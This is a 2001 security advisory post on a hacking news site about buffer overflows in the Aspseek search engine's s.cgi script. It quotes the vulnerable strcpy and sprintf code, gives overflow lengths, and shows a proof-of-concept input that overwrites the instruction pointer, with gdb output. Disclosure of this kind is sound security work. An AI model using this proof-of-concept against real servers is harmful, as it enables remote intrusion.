Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » Aspseek Search Engine buffer overflow

Aspseek Search Engine buffer overflow

by phiber on March 20th, 2001 Once compiled and properly setup, you are left to copy s.cgi to the cgi-bin of your webserver. This script acts as the input and output for the search engine, taking user defined data and outputs the search results. Unfortunately there is a problem in the parsing of user defined data.


There are multiple buffer overflow conditions in s.cgi, the first being the
most obvious:

1.
sc.cpp:
int search(char *exe, char *arg) {
==>
if ((env = getenv("QUERY_STRING")))
{
strcpy(query_string, env);
....
}
<==
}

Where query_string is defined as: query_string[STRSIZ] = query_string[4 x 1024]

Through experimentation i found that it would take at least 10272 chars to
overflow this buffer, therefore making it useless remotely. Since Apache by
default will only take a URI of 8190 bytes length.

2.
templates.cpp:
int CCgiQuery::ParseCgiQuery(char* query, char* templ) {
==>
else if ((!STRNCMP(token, "tmpl="))
{
char* tmpl = token + 5;
char tmplu[2000];
sprintf(tmplu, "&tmpl=%s", tmpl);
....
}
<==
}

The above condition is a classic buffer overflow, i found that the buffer can
be overflowed with 5148 bytes of data. Therefore making this remotely
exploitable.

Example,

[[email protected] cgi-bin]# export QUERY_STRING="q=a&tmpl=`perl -e'printf("a"x5200)'`"
[[email protected] cgi-bin]# ./s.cgi

Content-type: text/html

Can't open template file 'aaaaa...............'!
Segmentation Fault (core dumped)

[[email protected] cgi-bin]# gdb s.cgi core

GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-asplinux-linux"...
Core was generated by `./s.cgi'.
Program terminated with signal 11, Segmentation fault.

#0 0x61616161 in ?? ()




Download exploit

Posted by NeilK ([email protected]/[email protected]), www.alldas.de.


Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »